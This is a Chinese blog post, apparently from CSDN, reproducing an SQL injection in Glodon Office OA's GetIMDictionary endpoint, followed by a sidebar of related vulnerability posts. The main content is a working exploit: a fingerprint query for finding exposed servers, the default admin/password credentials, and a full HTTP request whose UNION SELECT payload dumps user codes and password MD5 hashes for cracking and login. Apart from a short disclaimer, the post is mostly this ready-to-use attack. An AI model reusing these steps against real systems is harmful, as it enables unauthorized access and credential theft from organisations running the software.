广联达办公OA-SQL注入漏洞

最新推荐文章于 2024-07-17 00:00:00 发布
最新推荐文章于 2024-07-17 00:00:00 发布
阅读量580 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/132557816
版权

该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。

漏洞复现

广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。默认弱口令admin password,后面就不提了。

资产收集

web.body="/Services/Identification/Server/"

构造请求包

 

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 77

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

 发送请求包,在返回包里面会存在账号已经密码的MD5值,需要对MD5值进行解密,才能得到登录密码

 

仲瑿
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现-通达OA】通达OA WHERE_STR 存在前台SQL注入漏洞
xiaokp7的博客
02-18 503
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
广联达OA接口ArchiveWebService存在XML实体注入漏洞
最新发布
xiaokp7的博客
07-24 162
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。广联达 ArchiveWebService接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
广联达-Linkworks-GetUserByUserCode SQL注入(含批量验证poc)(1)
04-12 261
由于广联达 GetUserByUserCode 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。(img-zngkSYxO-1712903563098)]厂内推、面试辅导),让我们一起学习成长!因篇幅有限,仅展示部分资料。
广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)
0xSec
08-12 3938
​​由于 广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
广联达OA GetIMDictionarySQL注入漏洞
xiaokp7的博客
09-13 262
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
漏洞复现】广联达 Linkworks办公OA SQL注入
zkaqlaoniao的博客
10-27 595
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
凝聚力安全团队
07-17 291
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
通过oa后台入侵mysql_通达OA 11.7 后台sql注入getshell漏洞复现
weixin_39779530的博客
01-28 162
通达OA 11.7 后台sql注入漏洞复现一、漏洞描述通达OA 11.7存在sql注入二、漏洞影响版本通达oa 11.7利用条件:需要账号登录三、漏洞复现1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装2、condition_cascade参数存在布尔盲注POC:GET /general/hr/manage...
广联达OA GetUserByUserCode SQL注入漏洞
xiaokp7的博客
09-13 506
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于 广联达 Linkworks办公OA GetUserByUserCode接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
广联达OA sql注入.zip
08-24
标题 "广联达OA sql注入.zip" 涉及到的是一个针对广联达OA系统(广联达是建筑行业信息化解决方案提供商)的SQL注入漏洞SQL注入是一种常见的网络安全问题,它允许攻击者通过在输入字段中插入恶意的SQL代码来操纵...
广联达软件教程-学习课件.ppt
11-21
广联达软件教程-学习课件.ppt
广联达2.5锁-针对321版本,黄锁-写锁软件
05-31
广联达2.5锁-针对321版本,黄锁-----写锁软件 安装步骤 注明:必须退出防火墙,和所有杀毒软件(安全卫士,360杀毒,电脑管家等等杀毒软件) 官方软件下载网址:www.fwxgx.com ,或者联系技术员发网盘链接 第一步...
1号办公楼-广联达学生实训(附加清单表)
06-23
理工学院19级工程造价学生实训所使用的GTJ(附加工程量清单)模型,可用于教学等方面。 首先说明几点 1.这个模型画了很久,肯定有很多地方有问题,细节问题也没在管了。自己尝试发现问题 2.我这里有GTJ2021和2018...
广联达图形软件-问题集(全部).docx
11-21
广联达图形软件是一款在建筑行业中广泛使用的专业软件,它主要用于建筑设计、工程量计算和施工图绘制。这个软件的问题集涵盖了多个关键功能和常见问题,包括柱、墙的绘制和编辑,模板面积计算,以及特殊结构如人防墙...
广联达OA前台sql注入+后台文件上传漏洞复现分析
博客地址 www.sec0nd.top
08-15 2491
广联达OA前台sql注入+后台文件上传漏洞复现分析
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 826
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
广联达OA后台msgbroadcastuploadfile.aspx任意文件上传漏洞
xiaokp7的博客
09-13 415
广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2030
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
泛微OA 最新前台未授权sql注入
swordheart的博客
07-24 1147
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology FileDownloadForOutDoc 未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
广联达接口sql注入
07-20
关于广联达接口的SQL注入问题,通常指的是开发者在其提供的API(如GetDeptByDeptCode这类服务接口)中,未能正确处理用户输入,使得恶意用户能够通过精心构造的SQL查询语句,试图绕过正常的权限控制,访问、修改或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值